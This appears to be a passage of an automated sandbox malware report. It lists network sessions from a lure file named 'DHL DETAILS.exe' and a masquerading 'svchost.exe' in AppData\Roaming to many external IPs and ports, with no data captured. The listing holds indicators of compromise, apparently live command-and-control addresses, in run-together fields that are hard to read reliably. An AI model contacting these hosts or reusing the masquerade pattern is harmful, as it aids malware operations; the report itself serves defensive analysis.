                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6355192.168.2.559292162.159.242.1588043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6356192.168.2.559310104.16.81.768043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6357192.168.2.55165841.65.224.9119816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6358192.168.2.559207120.77.148.138808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6359192.168.2.559279203.74.125.18888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6360192.168.2.559346201.174.239.28415343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6361192.168.2.559361172.67.35.158043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6362192.168.2.55871272.206.181.976494343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6363192.168.2.552523171.250.222.1310806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6364192.168.2.55929835.199.90.225888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6365192.168.2.55802767.201.59.70414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6366192.168.2.55933947.243.114.192818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6367192.168.2.55938435.72.118.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6368192.168.2.5593288.219.228.1001567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6369192.168.2.55801945.11.95.165603943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6370192.168.2.557941109.194.22.61808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6371192.168.2.563322103.130.218.1353233856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6372192.168.2.55073282.165.208.12631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6373192.168.2.559389121.128.194.1548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6374192.168.2.55941984.39.112.144312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6375192.168.2.558808201.13.147.161567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6376192.168.2.553726192.252.208.70142826352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6377192.168.2.55881027.65.240.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6378192.168.2.55816935.199.90.225888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6379192.168.2.559426210.4.194.1968043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6380192.168.2.559481104.20.24.2148043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6381192.168.2.559498172.67.253.698043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6382192.168.2.559334116.199.168.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6383192.168.2.550738193.138.178.682826352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6384192.168.2.563474107.180.90.886408156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6385192.168.2.56342141.77.188.1318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6386192.168.2.55902245.61.188.1344449943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6387192.168.2.551211132.148.245.247109586352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6388192.168.2.552882162.214.225.223340716352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6389192.168.2.559504162.214.225.2235491743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6390192.168.2.56346251.75.126.1503669456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6391192.168.2.558809180.250.159.49415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6392192.168.2.55888651.15.234.2221637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6393192.168.2.5596348.213.128.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6394192.168.2.5596388.213.128.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6395192.168.2.5596438.213.128.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6396192.168.2.5596478.213.128.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6397192.168.2.55944451.210.223.9300043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6398192.168.2.559387103.153.154.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6399192.168.2.559544159.65.77.168858543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6400192.168.2.553563183.100.14.13480006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6401192.168.2.559447167.172.86.461047143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6402192.168.2.5594748.218.231.621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6403192.168.2.559501211.222.252.1878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6404192.168.2.559587199.229.254.129414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6405192.168.2.552939138.36.199.1441536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6406192.168.2.559654104.21.102.958043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6407192.168.2.559690104.21.6.888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6408192.168.2.55952947.74.152.29888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6409192.168.2.563523207.180.198.2415732756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6410192.168.2.559570202.83.102.83808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6411192.168.2.559631201.174.239.28415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6412192.168.2.55964492.204.135.376346243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6413192.168.2.559721198.105.100.156640743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6414192.168.2.553701158.69.53.9893006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6415192.168.2.558948170.245.132.1599943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6416192.168.2.559669144.76.96.180556643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6417192.168.2.559702106.14.255.1248043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6418192.168.2.559784172.67.181.518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6419192.168.2.559789104.16.213.2028043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6420192.168.2.5596998.222.164.2051567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6421192.168.2.55195551.222.241.157462866352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6422192.168.2.55967643.128.107.251888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6423192.168.2.55144482.146.37.145806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6424192.168.2.551511148.72.209.174380886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6425192.168.2.552079112.78.155.21080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6426192.168.2.551905162.214.227.68318256352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6427192.168.2.558748125.227.225.157338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6428192.168.2.55380334.81.72.31806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6429192.168.2.559796159.65.77.168858543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6430192.168.2.55199951.38.63.124109836352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6431192.168.2.552250188.132.221.16380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6432192.168.2.563610185.103.178.242414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6433192.168.2.559347193.151.130.114808643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6434192.168.2.5596395.32.88.130808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6435192.168.2.559107115.96.208.124808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6436192.168.2.559589119.39.68.105232343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6437192.168.2.558807117.160.250.138889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6438192.168.2.55920050.62.134.139265543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6439192.168.2.559066138.36.150.15108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6440192.168.2.559352199.102.107.145414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6441192.168.2.55978658.234.116.197819743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6442192.168.2.558752142.54.228.193414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6443192.168.2.553286162.243.55.12509416352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6444192.168.2.553048220.118.191.23831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6445192.168.2.55330137.187.77.58525936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6446192.168.2.563729162.214.121.1733357256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6447192.168.2.55872368.169.60.220838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6448192.168.2.563694208.87.131.2404136856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6449192.168.2.559531106.105.218.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6450192.168.2.553929162.240.72.139255916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6451192.168.2.55357037.97.201.252806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6452192.168.2.559611103.66.177.173225143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6453192.168.2.559839162.159.247.578043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6454192.168.2.559792121.128.194.1548043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6455192.168.2.55980170.166.167.385772843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6456192.168.2.55979884.39.112.144312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6457192.168.2.5597958.219.228.1001567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6458192.168.2.55917837.187.91.1922198143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6459192.168.2.559853199.229.254.129414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6460192.168.2.559633185.49.31.207808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6461192.168.2.559626103.36.35.135808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6462192.168.2.55981951.210.223.9300043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6463192.168.2.559872201.174.239.28415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6464192.168.2.559885129.213.150.205808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6465192.168.2.554313107.180.90.88203096352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6466192.168.2.55273727.147.131.12280906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6467192.168.2.5598668.218.231.621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6468192.168.2.559856200.10.73.210567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6469192.168.2.559774119.39.68.105232343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6470192.168.2.559905159.65.77.168858543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6471192.168.2.559858144.24.77.905555543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6472192.168.2.559869211.222.252.1878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6473192.168.2.55945572.210.208.101414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6474192.168.2.559871167.172.86.461047143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6475192.168.2.55478654.38.176.200265916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6476192.168.2.56386484.47.145.189808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6477192.168.2.554433152.67.10.19081006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6478192.168.2.559889138.36.199.14415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6479192.168.2.563854189.39.118.210567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6480192.168.2.559902202.83.102.83808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6481192.168.2.55989547.100.236.23808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6482192.168.2.559622104.200.135.46414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6483192.168.2.55929537.187.141.160260443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6484192.168.2.559939172.67.182.488043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6485192.168.2.554425196.216.14.8641456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6486192.168.2.55990831.28.4.1928043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6487192.168.2.559617199.58.184.97414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6488192.168.2.55991547.74.152.29888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6489192.168.2.55259495.56.254.13931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6490192.168.2.563999209.126.104.381509756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6491192.168.2.56150091.134.140.1604968743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6492192.168.2.56102591.134.140.1605301243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6493192.168.2.561236162.240.72.1394741843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6494192.168.2.56107645.117.179.179652243220C:\Users\user\AppData\Roaming\svchost.exe
